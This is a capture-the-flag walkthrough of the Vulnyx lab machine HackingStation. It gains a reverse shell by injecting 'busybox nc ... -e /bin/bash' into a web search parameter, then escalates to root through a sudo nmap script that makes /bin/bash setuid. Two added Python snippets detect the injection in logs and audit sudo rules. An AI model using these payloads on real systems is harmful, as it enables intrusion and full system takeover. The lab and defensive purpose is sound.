Vlx_HackingStation

Target source: https://vulnyx.com/

Difficulty: Low

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:13 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00045s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00034s latency).
MAC Address: 08:00:27:52:FA:08 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.70
Host is up (0.00079s latency).
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.51 seconds

Target IP: 192.168.2.70

2. Port Scanning

1. Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.70
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:14 +0800
Nmap scan report for 192.168.2.70
Host is up (0.00059s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

Open port: 80

2. Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p80 192.168.2.70
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:14 +0800
Nmap scan report for 192.168.2.70
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: HackingStation
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.27 seconds

3. UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.70
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-05 10:15 +0800
Nmap scan report for 192.168.2.70
Host is up (0.0012s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:12:3E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 112.46 seconds

II. Web Penetration

1. HTTP Service

Browsing to port 80 shows a "hacking station" page that offers an exploit search.

2. Directory Scanning

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.70 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.70
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: php,html,js,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 684]
javascript (Status: 301) [Size: 317] [--> http://192.168.2.70/javascript/]
server-status (Status: 403) [Size: 277]
Progress: 1042622 / 1323348 (78.79%)^C

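Nothing useful was found.

III. Gaining Access as hacker

Trying the id command in the search box shows that the input is executed as a command.

Spawn a reverse shell directly: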

http://192.168.2.70/exploitQuery.php?product=rev&busybox nc 192.168.2.4 4444 -e /bin/bash


The shell is obtained successfully:

┌──(root㉿kali)-[/tmp]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.70] 49748
id
uid=1000(hacker) gid=1000(hacker) groups=1000(hacker)
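
The injection above reaches a shell through the product parameter of exploitQuery.php, so it leaves a trace in the web server's access log. As an added example (not part of the original write-up), this detector URL-decodes that parameter and flags shell metacharacters; the Apache common log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/exploitQuery.php"   # path taken from the request shown above
PARAM = "product"                # parameter taken from the request shown above

# Characters a shell treats as separators, substitution or redirection.
SHELL_META = re.compile(r"[;&|`$<>\r\n]")

# Prefix of an Apache common/combined log line (assumed log format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_requests(lines):
    """Return (ip, timestamp, decoded value) for requests whose PARAM
    contains shell metacharacters after URL decoding."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != ENDPOINT:
            continue
        # parse_qsl percent-decodes values, so %3B and %26 become ; and &
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM and SHELL_META.search(value):
                hits.append((m["ip"], m["ts"], value))
    return hits

# Constructed sample lines, not taken from the target's real logs.
SAMPLE_LOG = [
    '192.168.2.4 - - [05/Feb/2026:03:40:01 +0100] "GET /exploitQuery.php?product=apache HTTP/1.1" 200 512',
    '192.168.2.4 - - [05/Feb/2026:03:41:10 +0100] "GET /exploitQuery.php?product=rev%3Bid HTTP/1.1" 200 640',
    '192.168.2.4 - - [05/Feb/2026:03:41:55 +0100] "GET /exploitQuery.php?product=rev%26id HTTP/1.1" 200 640',
    '192.168.2.4 - - [05/Feb/2026:03:42:30 +0100] "GET /index.html?product=a%3Bb HTTP/1.1" 200 684',
]

if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {PARAM}={value!r}")
```

Detection is only the fallback: the fix belongs in the handler, which should never pass the search term to a shell.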

Stabilize the shell

/usr/bin/script -qc /bin/bash /dev/null
# Press Ctrl+Z to suspend it
stty raw -echo; fg
# Press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege Escalation

Check sudo -l

hacker@HackingStation:/home/hacker$ sudo -l
Matching Defaults entries for hacker on HackingStation:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User hacker may run the following commands on HackingStation:
(root) NOPASSWD: /usr/bin/nmap
hacker@HackingStation:/home/hacker$ TF=$(mktemp)
hacker@HackingStation:/home/hacker$ echo 'os.execute("chmod 4755 /bin/bash")' > $TF
hacker@HackingStation:/home/hacker$ sudo /usr/bin/nmap --script=$TF
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-05 03:46 CET
NSE: Warning: Loading '/tmp/tmp.bRbOFSDZxO' -- the recommended file extension is '.nse'.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:636: /tmp/tmp.bRbOFSDZxO is missing required field: 'action'
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:636: in field 'new'
/usr/bin/../share/nmap/nse_main.lua:840: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
[C]: in ?

QUITTING!

Root privileges are obtained successfully:

hacker@HackingStation:/home/hacker$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash
hacker@HackingStation:/home/hacker$ /bin/bash -p
bash-5.2# id
uid=1000(hacker) gid=1000(hacker) euid=0(root) groups=1000(hacker)
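
The escalation works because the sudoers rule grants nmap with unrestricted arguments, and nmap's --script option runs caller-supplied Lua as root. As an added example (not part of the original write-up), this audit parses `sudo -l` output for such rules and checks shells for a leftover setuid bit; the SCRIPTABLE list and the second sample rule are assumptions constructed for illustration.

```python
import os
import re
import stat

# Programs that run caller-supplied code when their arguments are unrestricted.
# Short illustrative list (an assumption); nmap qualifies because --script
# loads arbitrary Lua, which is what the session above relies on.
SCRIPTABLE = {"nmap", "vim", "find", "awk", "perl", "python3", "less", "bash", "sh"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def risky_sudo_rules(sudo_l_output):
    """Return (runas, binary, nopasswd) for rules that hand out code execution."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in m["cmds"].split(","):   # simplification: ignores escaped "\,"
            parts = cmd.split()
            if not parts:
                continue
            binary, pinned_args = parts[0], len(parts) > 1
            if binary == "ALL" or (os.path.basename(binary) in SCRIPTABLE and not pinned_args):
                findings.append((runas, binary, nopasswd))
    return findings

def setuid_root_files(paths=("/bin/bash", "/bin/sh", "/bin/dash")):
    """Return the paths that are owned by root and carry the setuid bit."""
    hits = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue
        if st.st_uid == 0 and st.st_mode & stat.S_ISUID:
            hits.append(path)
    return hits

# First rule is from the sudo -l output above; the second is constructed.
SAMPLE_SUDO_L = """\
User hacker may run the following commands on HackingStation:
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/nmap -sn 192.168.2.0/24
"""

if __name__ == "__main__":
    print(risky_sudo_rules(SAMPLE_SUDO_L))
    print(setuid_root_files())
```

On a host in the state shown above, setuid_root_files() would report /bin/bash, which should never carry the setuid bit.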

V. Reading the Flags

bash-5.2# cat /root/root.txt /home/hacker/user.txt 
f900f7fb7d2c5ea64deca6378ebe5ead
e34efd51251772a8abc4cc00ee52bb0a

Vlx_HackingStation
http://miao-sec.github.io/Vulnyx/Vlx_HackingStation/
Author: Miao
Published: February 5, 2026
License: BY-MIAO